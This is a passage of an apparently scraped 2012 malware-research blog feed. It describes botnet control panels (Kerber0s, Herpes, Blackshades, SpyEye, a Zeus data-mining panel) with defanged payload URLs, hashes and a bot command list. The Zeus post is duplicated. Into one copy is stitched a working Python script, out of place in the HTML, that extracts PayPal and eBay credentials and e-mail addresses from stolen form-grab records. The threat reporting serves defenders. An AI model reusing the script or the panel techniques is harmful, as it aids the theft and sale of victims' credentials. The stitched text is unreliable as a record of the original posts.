IP also resolves the fraudulent domains prontomentos.com, soledantos.com, patentpendingnotetaker.net
and rontomentos.com.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The
URL through which infected computers communicate with the Trojan Control Panel
is:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">hXXp://91.220.35.45/forum.php</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Ni0hb7TUJuQ/UKummUZuaiI/AAAAAAAAASM/V1XsjNuUFiw/s1600/conexion.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://4.bp.blogspot.com/-Ni0hb7TUJuQ/UKummUZuaiI/AAAAAAAAASM/V1XsjNuUFiw/s400/conexion.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The Trojan
Control Panel is accessed via the URL:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">hXXp://91.220.35.45/kurcina123/<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mnmIpBpuAaI/UKumtEqkZUI/AAAAAAAAASU/qRnmp_O7NyI/s1600/panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://4.bp.blogspot.com/-mnmIpBpuAaI/UKumtEqkZUI/AAAAAAAAASU/qRnmp_O7NyI/s400/panel.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span lang="EN-US">The word “kurcina”
means “</span><span lang="EN-US">A really big di*k” in Serbian.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span lang="EN-US"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This
control panel incorporates 2 new modules.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The
"E-Mail Grabber" plugin:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-olpRVIYAS8M/UKum84t8H2I/AAAAAAAAASc/79pspAF4A-c/s1600/mails.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="http://4.bp.blogspot.com/-olpRVIYAS8M/UKum84t8H2I/AAAAAAAAASc/79pspAF4A-c/s400/mails.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This module
has been active since 11/05/2012 and has collected more than 159.288 e-mail addresses, most
of them from computer users in Slovenia, Bosnia and Herzegovina and other Balkan
republics.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The other
new plugin is the "FTP Grabber":<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-yKqwONN8YXI/UKun3dXTeGI/AAAAAAAAASk/BKEl6UHoyJI/s1600/ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://1.bp.blogspot.com/-yKqwONN8YXI/UKun3dXTeGI/AAAAAAAAASk/BKEl6UHoyJI/s400/ftp.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">Accessing
the statistics panel module shows that the criminals are primarily interested
in collecting private data from users' e-mail accounts and social networks,
which means that this panel has been created mainly for the purpose of
espionage and intelligence gathering on the profiles and behaviour patterns of
users of the Balkan republics.</span><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-qVgvipLRh0c/UKun-AUM6dI/AAAAAAAAASs/UXGk0zA29yw/s1600/hosts.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://3.bp.blogspot.com/-qVgvipLRh0c/UKun-AUM6dI/AAAAAAAAASs/UXGk0zA29yw/s400/hosts.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-92030313433476054202012-11-09T14:16:00.000-08:002012-11-09T14:16:11.996-08:00Kerber0s Bot Panel<br />
<span style="font-family: Arial, Helvetica, sans-serif;">A new botnet called "Kerber0s Bot Panel" has been found. This control panel is hosted at IP 46.166.163.127, belonging to the provider INTERNET-SERVICES SANTREX in Romania.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The malware infection vector is downloaded from the address:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">hxxp://46.166.163.127/1.exe</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Size: 489,472</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">MD5: e3954dfb5e35eb32c02530838fa8d4c9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">and</span><br />
<div class="MsoNormal">
<span style="font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;">hXXp://46.166.163.127/images/support/uTorrent.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Size: 896400</span></div>
<div class="MsoNormal">
<span style="font-family: Arial;">MD5:
59fe95f7fede6d69c007e2cd05356f07<o:p></o:p></span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The control panel access menu is located at the URL: hxxp://46.166.163.127/login.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HyyGSiFd9Js/UJ17ACYuNJI/AAAAAAAAARU/9vFDCjCxEKE/s1600/kerber0s.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://3.bp.blogspot.com/-HyyGSiFd9Js/UJ17ACYuNJI/AAAAAAAAARU/9vFDCjCxEKE/s400/kerber0s.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-xBF5chX5mWo/UJ17HWhjjqI/AAAAAAAAARc/rfGxoNvyenw/s1600/shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="http://3.bp.blogspot.com/-xBF5chX5mWo/UJ17HWhjjqI/AAAAAAAAARc/rfGxoNvyenw/s400/shell.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">The commands this botnet can run on infected machines are the same ones used by the Herpes botnet; the list below is taken from its own panel help:</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Commands:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Download/Execute: Downloads and executes the specified file.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the file to be downloaded.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Update: Downloads and updates.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the file to be downloaded and updated.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Visit Page [Visible]: Opens the default browser and visits the specified webpage.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the page to be visited.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Visit Page [Invisible]: Opens Internet Explorer silently and visits the specified webpage.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the page to be visited.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Keylog: Sends the keylogger log to our server; you will be able to download it from the Bot Informations page. Attention: every uploaded file will remain there for 15 minutes and will then be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Reset Keylog: Clears the key log.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Screenshot: Takes a screenshot and sends it to our server; you will be able to download it from the Bot Informations page. Attention: every uploaded file will remain there for 15 minutes and will then be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Error Log: Sends the error log to our server; you will be able to download it from the Bot Informations page. Attention: every uploaded file will remain there for 15 minutes and will then be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">DDoS Webpage: Sends requests to the specified webpage for 60 seconds (please note that the bot will not execute commands for 60 seconds because it is DDoSing; a high number of selected online bots will crash the webserver).</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The webpage to be requested.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Silent CPU&GPU Bitcoin Miner: Start using your bots to make a lot of bitcoins.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = http://workerusername:workerpassword@poolhost:poolport</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Example: http://lollipop:byebye@pool.bitclockers.com:8332</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Tip: To disable mining, just send this command with the variable box empty.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Torrent Seeder v2.5+: Start using your bots to seed your torrent for you.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the .torrent file to be downloaded.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Example: http://www.mywebsite/download.torrent</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Open and Close CD Tray v2.5.1+: Just opens or closes the CD tray.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Message Box v2.5.1+: Spawns a message box on the screen.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The message to send.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Swap and Restore Mouse Buttons v2.5.1+: Swaps the mouse buttons or returns them to normal.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Uninstall: Removes Herpes from the system.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">The same criminal server infrastructure also hosts a control panel named "CASHMARKET AFFILIATE", which is the well-known Blackshades botnet panel with modifications.</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">This control panel is accessed at the malicious URL: hxxp://46.166.163.127/bs/</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">The criminals did not even change the default "bs" installation folder that ships with the Blackshades kit.</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #333333; font-family: Arial;"><a href="http://2.bp.blogspot.com/-YHtIPvgtVxU/UJ19nTKQsSI/AAAAAAAAAR0/bD5FAYKUkrM/s1600/CASHMARKET.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://2.bp.blogspot.com/-YHtIPvgtVxU/UJ19nTKQsSI/AAAAAAAAAR0/bD5FAYKUkrM/s400/CASHMARKET.jpg" width="400" /></a></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
</div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-65294855090945980762012-10-30T04:38:00.000-07:002012-10-30T04:38:14.987-07:00Control Panel for data mining information from repositories of banker Zeus TrojansA new control panel has been found that is designed to query and extract data from the repositories of Zeus-family banking Trojans and their variants. Like a data mining application, it connects to the different database repositories where the Trojans store stolen data and searches them for the required data using regular expressions.<br />
<br />
<br />
Logging into the control panel shows the following screen.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s1600/1-Modified.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" qea="true" src="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s400/1-Modified.JPG" width="400" /></a></div>
<br />
This approach gives the criminals the advantage of connecting directly to the remote databases that hold the confidential information of compromised users, without having to log into the control panels that host those data repositories. Queries run directly against the databases and never interfere with the operation of the control panel that manages the botnet's zombie machines.<br />
<br />
In this way the criminals also avoid leaving traces on the web servers: every operation on the captured data happens without a record in the web server's log files.<br />
<br />
Connecting to the databases of a Trojan control panel is quite simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s1600/1-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" qea="true" src="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s320/1-b.jpg" width="320" /></a></div>
<br />
In the control panel settings one configures the connection string of the database where the Trojan's repository is stored, and the Trojan class whose information is to be extracted for analysis and processing.<br />
<br />
The Trojan classes the application works with are: Carberp, Citadel, Ice9, SpyEye, Zeus 1.1, Zeus 1.2 and Zeus 2.<br />
<br />
All these Trojans differ in how they operate, but they store the stolen information in their databases in very similar ways, and this control panel is able to adapt to the database structure of each one.<br />
<br />
The search engine over the repositories is built on the power of regular expressions, as shown in the next screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s1600/1-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" qea="true" src="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s400/1-c.jpg" width="400" /></a></div>
<br /><br />
In this example, created by default in the control panel, you can see the regular expression that would be used to locate in the Trojan's data repository all stolen access credentials that match the defined "user/password" format for the legitimate PayPal and eBay websites.<br />
<br />
These regular expressions make it possible to search the whole Trojan database of stolen user data by naming the variables in which passwords, or any other data of interest, are stored.<br />
<br />
With regular expressions any searchable text format can be defined: email addresses, dates, passport numbers, social security numbers, and so on. The possibilities are endless.<br />
<br />
It is even possible to create search templates and store them for future use.<br />
<br />
The search engine also offers multiple search options, such as searching by zombie machine ID, by URL, and even by the POST data and mail headers captured from compromised users.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s1600/1-d.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" qea="true" src="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s400/1-d.jpg" width="400" /></a></div>
<br />
There is even an automated module for searching for confidential credit card information; in this module you can specify key search fields such as the card's CVV code, or apply the Luhn algorithm.<br />
<br />
The Luhn algorithm, or "modulus 10 algorithm", is a checksum formula used to validate credit card identification numbers.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s1600/1-cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" qea="true" src="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s400/1-cards.jpg" width="400" /></a></div>
<br />
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-38468005597095576422012-10-29T08:00:00.000-07:002012-10-29T08:06:12.624-07:00Data extraction panel for ZEUS banking Trojan repositoriesA new control panel has been located that is designed to query and extract data from the repositories of Zeus-family banking Trojans and their variants. As if it were a data mining application, it connects to the different databases the Trojans use as repositories of stolen data and searches them with regular expressions for the data of interest.<br />
<br />
<br />
Logging into the control panel shows the following information.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s1600/1-Modified.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" qea="true" src="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s640/1-Modified.JPG" width="640" /></a></div>
This system gives the criminals the direct advantage of connecting remotely to the databases that hold all the confidential information of compromised users, without having to log into the control panels where those data repositories are hosted. Queries run directly against the databases without ever interfering with the operation of the control panel that manages all the bots or zombie machines.<br />
<br />
In this way the criminals also avoid leaving traces on the web servers every time they have to perform an operation on the captured data, leaving nothing in the web server's log files.<br />
<br />
Connecting to the databases of the Trojan's control panel is quite simple:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s1600/1-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" qea="true" src="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s320/1-b.jpg" width="320" /></a></div>
In the control panel's configuration options one sets the connection strings of the database where the Trojan's repository is stored, as well as the type of Trojan whose information is to be extracted for analysis and processing.<br />
<br />
The Trojan types the application works with are: Carberp, Citadel, ICE9, SpyEye, Zeus 1.1, Zeus 1.2, Zeus2.<br />
<br />
All these Trojans differ in how they work but are quite similar in the way they store the stolen information in the database, and the tool is able to adapt to the database structure of each of them.<br />
<br />
The search engine over the repository data is based on the power of regular expressions, as can be seen here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s1600/1-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" qea="true" src="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s400/1-c.jpg" width="400" /></a></div>
In this example, which comes created by default in the control panel, you can see the regular expression that would be used to locate in the Trojan's data repository all stolen access credentials matching the defined user/password format for the PayPal and eBay websites.<br />
<br />
These regular expressions allow searching the whole Trojan database for users' confidential data by defining the names of the variables that store passwords, or any other compromised data one wishes to locate.<br />
<br />
With regular expressions any text search format can be defined, such as email addresses, dates, passport numbers, social security numbers, etc. The possibilities are countless.<br />
<br />
Search templates can even be created and stored for future actions.<br />
<br />
The search engine also offers search options by zombie machine identifier, by URL, and even by mail data captured from the headers of compromised users.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s1600/1-d.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" qea="true" src="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s400/1-d.jpg" width="400" /></a></div>
It has an automated module for searching for credit card data, in which key search fields can be specified, such as the card's CVV code, or the Luhn algorithm can be applied.<br />
<br />
The Luhn algorithm, or "modulus 10 algorithm", is a checksum formula used to validate credit card identification numbers.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s1600/1-cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" qea="true" src="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s400/1-cards.jpg" width="400" /></a></div>
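<br />The regex search templates described in this post and in its English-language copy above are easy to picture in code. The following Python script is an added example written for this page, not the panel's own code: it keeps named regular-expression templates, runs one of them over a small constructed repository of form-grab records (bot identifier, URL posted to, raw POST body) with optional filters by bot ID and by URL, and percent-decodes what the template captures. The record layout, the PayPal/eBay login field names (login_email/login_password and userid/pass) and every value in the repository are assumptions made for the example.<br />

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed repository in the shape a Zeus-style panel keeps form-grab reports:
# bot identifier, the URL the victim posted to, and the raw POST body.
# Every value here is invented for this example.
REPOSITORY = [
    {"bot_id": "BOT_AR_0001",
     "url": "https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit",
     "post": "login_email=alice%40example.net&login_password=Sup3rSecret&cmd=_login-submit"},
    {"bot_id": "BOT_MX_0002",
     "url": "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn",
     "post": "userid=bob_sells&pass=hunter2&keepMeSignInOption=1"},
    {"bot_id": "BOT_MX_0002",
     "url": "https://mail.example.org/login",
     "post": "user=carol%40example.org&password=letmein"},
    {"bot_id": "BOT_CL_0003",
     "url": "https://www.paypal.com/cgi-bin/webscr",
     "post": "cmd=_flow&session=abc123"},
]

# Named search templates, stored for reuse the way the panel stores them.
# The PayPal/eBay field names are assumptions for this example.
TEMPLATES: Dict[str, str] = {
    "paypal_ebay_creds":
        r"(?:login_email|userid)=(?P<user>[^&]+)&(?:login_password|pass)=(?P<password>[^&]+)",
    "email_address":
        r"[A-Za-z0-9._%+-]+(?:@|%40)[A-Za-z0-9.-]+\.[A-Za-z]{2,}",
}


@dataclass
class Hit:
    bot_id: str
    url: str
    fields: Dict[str, str]


def search(template_name: str, bot_id: Optional[str] = None,
           url_pattern: Optional[str] = None, records=REPOSITORY) -> List[Hit]:
    """Run one stored template over the repository, optionally restricted to a
    bot id and to URLs matching a regex, and return percent-decoded captures."""
    regex = re.compile(TEMPLATES[template_name], re.IGNORECASE)
    url_re = re.compile(url_pattern, re.IGNORECASE) if url_pattern else None
    hits: List[Hit] = []
    for rec in records:
        if bot_id and rec["bot_id"] != bot_id:
            continue
        if url_re and not url_re.search(rec["url"]):
            continue
        for m in regex.finditer(rec["post"]):
            # Named groups become the result columns; an unnamed template
            # returns the whole match under "match".
            captured = m.groupdict() or {"match": m.group(0)}
            hits.append(Hit(rec["bot_id"], rec["url"],
                            {k: unquote_plus(v) for k, v in captured.items()}))
    return hits


if __name__ == "__main__":
    for hit in search("paypal_ebay_creds", url_pattern=r"paypal\.com|ebay\.com"):
        print(hit)
    for hit in search("email_address"):
        print(hit)
```

The URL filter and the bot-ID filter are applied before the template runs, which is what makes the panel's "search by zombie ID / by URL" options cheap even on a large repository; the template itself only ever sees the POST body.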
<br />Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-84077524841438155452012-10-17T16:30:00.000-07:002012-10-17T16:30:09.538-07:00SPYEYE Trojan against Latin America<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">On the same fraudulent infrastructure that hosted the domain "<b>cybercartel.com.mx</b>", analysed in the previous article, the control panel of the SPYEYE Trojan is also installed, fully operational and collecting data from infected users.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The complete SpyEye Trojan kit is installed: both the module dedicated to bot control and malware propagation, and the module for managing and controlling the data captured on compromised machines.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The control panel for the bots, or zombie machines, can be seen to be still active and sending orders to the infected machines:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
